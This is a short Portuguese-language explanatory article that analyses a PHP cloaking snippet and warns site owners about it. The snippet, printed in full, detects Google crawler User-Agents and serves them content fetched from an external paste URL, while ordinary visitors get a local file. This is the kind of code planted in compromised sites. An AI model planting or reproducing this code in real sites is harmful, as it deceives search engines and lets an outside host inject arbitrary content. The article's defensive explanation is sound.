Este código PHP demonstra uma técnica conhecida como cloaking, onde o conteúdo exibido varia de acordo com quem está acessando o site. Embora pareça inofensivo, essa prática é frequentemente associada a SEO black hat e distribuição de conteúdo malicioso.
O Problema
O cloaking consiste em mostrar um conteúdo para robôs (como o Google) e outro completamente diferente para usuários reais. Isso pode ser usado para manipular resultados de busca ou esconder scripts maliciosos.
No código analisado, há uma verificação do User-Agent para identificar se o visitante é um bot do Google. Dependendo disso, o sistema retorna conteúdos diferentes:
- Para bots: carrega conteúdo remoto de uma URL externa
- Para usuários: carrega um arquivo local chamado
admin.txt
A Solução
Vamos analisar o código para entender exatamente como essa técnica funciona e por que ela é perigosa:
function is_google_bot() {
$agents = array("Googlebot", "Google-Site-Verification", "Google-InspectionTool", "Googlebot-Mobile", "Googlebot-News");
foreach ($agents as $agent) {
if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true;
}
return false;
}
if (is_google_bot()) {
$bot_content = file_get_contents('https://paste.haxor-research.com/raw/78e6c97e');
echo $bot_content;
exit;
} else {
include('admin.txt');
exit;
}
O que esse código faz na prática?
- Detecta bots: A função
is_google_bot()verifica se o User-Agent contém identificadores do Google. - Conteúdo remoto: Se for bot, faz um
file_get_contents()para buscar conteúdo externo. - Conteúdo oculto: Usuários comuns recebem outro conteúdo via
include().
Por que isso é perigoso?
- SEO Black Hat: Pode resultar em penalizações do Google.
- Segurança: Conteúdo remoto pode ser alterado a qualquer momento (backdoor).
- Injeção de malware: Sites comprometidos frequentemente usam essa técnica.
- Difícil detecção: Admins podem não perceber, pois veem conteúdo diferente do bot.
Conclusão
Esse tipo de implementação é um exemplo clássico de cloaking e deve ser evitado em qualquer cenário legítimo. Além de violar diretrizes de SEO, representa um sério risco de segurança, especialmente por carregar conteúdo remoto dinâmico.
Se você encontrar algo semelhante em um projeto, investigue imediatamente — pode ser um indicativo de invasão ou código malicioso inserido sem conhecimento da equipe.